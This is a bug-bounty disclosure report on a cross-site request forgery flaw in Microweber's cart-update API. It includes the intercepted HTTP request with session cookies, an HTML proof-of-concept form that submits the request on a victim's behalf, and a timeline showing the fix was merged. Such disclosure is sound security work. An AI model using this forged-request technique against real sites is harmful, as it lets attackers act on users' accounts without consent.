CSRF on update cart functionality in microweber/microweber

Valid

Reported on

Mar 31st 2022


I found a CSRF Vulnerability in the update cart functionality where there is no csrf token being validated While updating the cart as the authenticated user

Vulnerable Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12

Steps to Reproduce:

  • After authentication, click on any product and add it to the cart
  • Now, Intercept the request and the request looks as follows

Request:

POST /demo/api/update_cart HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=oVrVA2TbkeiJJIMoTt9UgfFU9BzqP41iW8YIIzmy; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/view%3Amodules/load_module%3Ausers/action%3Aprofile; csrf-token-data=%7B%22value%22%3A%22MumtS5v538A6QyfXzmwvx2nhZeXTQSUsQOGQRIwn%22%2C%22expiry%22%3A1648713233295%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/shop
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

price=199&content_id=12
  • As you can see there is no csrf token being validated, we can create a CSRF proof of concept to make things easier and to validate

CSRF Proof of Concept:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/update_cart" method="POST">
      <input type="hidden" name="price" value="199" />
      <input type="hidden" name="content&#95;id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Now whoever opens the HTML file and the product will get added to the cart

Impact

An attacker may be able to add their own product to the victim's account by lesser user interaction

Occurrences

CSRF token needs to implemented

We are processing your report and will contact the microweber team within 24 hours. 2 months ago
We have contacted a member of the microweber team and are waiting to hear back 2 months ago
We have sent a follow up to the microweber team. We will try again in 7 days. 2 months ago
Peter Ivanov modified the report
2 months ago
Peter Ivanov validated this vulnerability 2 months ago
Nithissh12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on d5635f 2 months ago
Peter Ivanov has been awarded the fix bounty
index.php#L1-L196 has been validated
to join this conversation